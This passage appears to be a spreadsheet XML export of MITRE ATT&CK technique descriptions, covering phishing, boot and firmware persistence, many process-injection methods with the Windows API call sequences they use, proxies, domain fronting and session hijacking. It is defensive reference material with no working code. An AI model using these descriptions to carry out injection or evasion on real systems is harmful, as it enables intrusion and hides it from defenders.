Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to  [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021)</t>
  </si>
  <si>
    <t>Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. 
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.
A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.</t>
  </si>
  <si>
    <t>Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the &lt;code&gt;info.plist&lt;/code&gt; file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format.(Citation: fileinfo plist file description) 
Adversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. [Hidden Window](https://attack.mitre.org/techniques/T1564/003)) or running additional commands for persistence (ex: [Launch Agent](https://attack.mitre.org/techniques/T1543/001)/[Launch Daemon](https://attack.mitre.org/techniques/T1543/004) or [Re-opened Applications](https://attack.mitre.org/techniques/T1547/007)).
For example, adversaries can add a malicious application path to the `~/Library/Preferences/com.apple.dock.plist` file, which controls apps that appear in the Dock. Adversaries can also modify the &lt;code&gt;LSUIElement&lt;/code&gt; key in an application’s &lt;code&gt;info.plist&lt;/code&gt; file  to run the app in the background. Adversaries can also insert key-value pairs to insert environment variables, such as &lt;code&gt;LSEnvironment&lt;/code&gt;, to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation: wardle chp2 persistence)(Citation: eset_osx_flashback)</t>
  </si>
  <si>
    <t>Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting)
Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.</t>
  </si>
  <si>
    <t>Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.</t>
  </si>
  <si>
    <t>Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.</t>
  </si>
  <si>
    <t>Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.</t>
  </si>
  <si>
    <t>Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.</t>
  </si>
  <si>
    <t>Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or &lt;code&gt;Get-Process&lt;/code&gt; via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as &lt;code&gt;CreateToolhelp32Snapshot&lt;/code&gt;. In Mac and Linux, this is accomplished with the &lt;code&gt;ps&lt;/code&gt; command. Adversaries may also opt to enumerate processes via /proc.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. 
There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. 
More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. 
APC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as &lt;code&gt;OpenThread&lt;/code&gt;. At this point &lt;code&gt;QueueUserAPC&lt;/code&gt; can be used to invoke a function (such as &lt;code&gt;LoadLibrayA&lt;/code&gt; pointing to a malicious DLL). 
A variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.(Citation: Microsoft Atom Table)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.  
DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as &lt;code&gt;VirtualAllocEx&lt;/code&gt; and &lt;code&gt;WriteProcessMemory&lt;/code&gt;, then invoked with &lt;code&gt;CreateRemoteThread&lt;/code&gt; (which calls the &lt;code&gt;LoadLibrary&lt;/code&gt; API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) 
Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of &lt;code&gt;LoadLibrary&lt;/code&gt;).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) 
Another variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module's &lt;code&gt;AddressOfEntryPoint&lt;/code&gt; before starting a new thread in the target process.(Citation: Module Stomping for Shellcode Injection) This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk.(Citation: Hiding Malicious Code with Module Stomping) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. 
Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)
Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.
Execution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as &lt;code&gt;WriteProcessMemory&lt;/code&gt; and &lt;code&gt;CreateRemoteThread&lt;/code&gt;.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process.  (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.
List-view controls are user interface windows used to display collections of items.(Citation: Microsoft List View Controls) Information about an application's list-view settings are stored within the process' memory in a &lt;code&gt;SysListView32&lt;/code&gt; control.
ListPlanting (a form of message-passing "shatter attack") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items.(Citation: Modexp Windows Process Injection) Adversaries must first copy code into the target process’ memory space, which can be performed various ways including by directly obtaining a handle to the &lt;code&gt;SysListView32&lt;/code&gt; child of the victim process window (via Windows API calls such as &lt;code&gt;FindWindow&lt;/code&gt; and/or &lt;code&gt;EnumWindows&lt;/code&gt;) or other [Process Injection](https://attack.mitre.org/techniques/T1055) methods.
Some variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored &lt;code&gt;WriteProcessMemory&lt;/code&gt; function. For example, an adversary can use the &lt;code&gt;PostMessage&lt;/code&gt; and/or &lt;code&gt;SendMessage&lt;/code&gt; API functions to send &lt;code&gt;LVM_SETITEMPOSITION&lt;/code&gt; and &lt;code&gt;LVM_GETITEMPOSITION&lt;/code&gt; messages, effectively copying a payload 2 bytes at a time to the allocated memory.(Citation: ESET InvisiMole June 2020) 
Finally, the payload is triggered by sending the &lt;code&gt;LVM_SORTITEMS&lt;/code&gt; message to the &lt;code&gt;SysListView32&lt;/code&gt; child of the process window, with the payload within the newly allocated buffer passed and executed as the &lt;code&gt;ListView_SortItems&lt;/code&gt; callback.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. 
PE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as &lt;code&gt;VirtualAllocEx&lt;/code&gt; and &lt;code&gt;WriteProcessMemory&lt;/code&gt;, then invoked with &lt;code&gt;CreateRemoteThread&lt;/code&gt; or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. 
Proc memory injection involves enumerating the memory of a process via the /proc filesystem (&lt;code&gt;/proc/[pid]&lt;/code&gt;) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes’ stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes’ memory map within &lt;code&gt;/proc/[pid]/maps&lt;/code&gt; can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) 
Other techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. 
Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)
Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)
Adversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as &lt;code&gt;NtUnmapViewOfSection&lt;/code&gt;, &lt;code&gt;VirtualProtectEx&lt;/code&gt;, and &lt;code&gt;SetThreadContext&lt;/code&gt;. (Citation: BlackHat Process Doppelgänging Dec 2017)
Process Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):
* Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.
* Load – Create a shared section of memory and load the malicious executable.
* Rollback – Undo changes to original executable, effectively removing malicious code from the file system.
* Animate – Create a process from the tainted section of memory and initiate execution.
This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.  
Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as &lt;code&gt;CreateProcess&lt;/code&gt;, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as &lt;code&gt;ZwUnmapViewOfSection&lt;/code&gt; or &lt;code&gt;NtUnmapViewOfSection&lt;/code&gt;  before being written to, realigned to the injected code, and resumed via &lt;code&gt;VirtualAllocEx&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, &lt;code&gt;SetThreadContext&lt;/code&gt;, then &lt;code&gt;ResumeThread&lt;/code&gt; respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)
This is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. 
Ptrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: &lt;code&gt;malloc&lt;/code&gt;) then invoking that memory with &lt;code&gt;PTRACE_SETREGS&lt;/code&gt; to set the register containing the next instruction to execute. Ptrace system call injection can also be done with &lt;code&gt;PTRACE_POKETEXT&lt;/code&gt;/&lt;code&gt;PTRACE_POKEDATA&lt;/code&gt;, which copy data to a specific address in the target processes’ memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) 
Ptrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.(Citation: BH Linux Inject) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. 
Thread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as &lt;code&gt;OpenThread&lt;/code&gt;. At this point the process can be suspended then written to, realigned to the injected code, and resumed via &lt;code&gt;SuspendThread &lt;/code&gt;, &lt;code&gt;VirtualAllocEx&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, &lt;code&gt;SetThreadContext&lt;/code&gt;, then &lt;code&gt;ResumeThread&lt;/code&gt; respectively.(Citation: Elastic Process Injection July 2017)
This is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state.  
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. 
TLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process’ memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: FireEye TLS Nov 2017)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. 
VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009)(Citation: Backtrace VDSO)(Citation: VDSO Aug 2005)(Citation: Syscall 2014)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process.  </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. 
There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling) 
[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19) 
Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. </t>
  </si>
  <si>
    <t>Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.</t>
  </si>
  <si>
    <t>Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).
For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.</t>
  </si>
  <si>
    <t>Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.
External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.</t>
  </si>
  <si>
    <t>Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.
By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.</t>
  </si>
  <si>
    <t>To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing)
In the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise.  By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes.  This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network.  This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.</t>
  </si>
  <si>
    <t>Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
The Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</t>
  </si>
  <si>
    <t>Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk. Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL)
Reflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)</t>
  </si>
  <si>
    <t>An adversary may use legitimate desktop support and remote access software, such as Team Viewer, AnyDesk, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.(Citation: Symantec Living off the Land)
Remote access tools may be installed and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system. Installation of many remote access tools may also include persistence (ex: the tool's installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)).
Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns.(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy)</t>
  </si>
  <si>
    <t>Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.
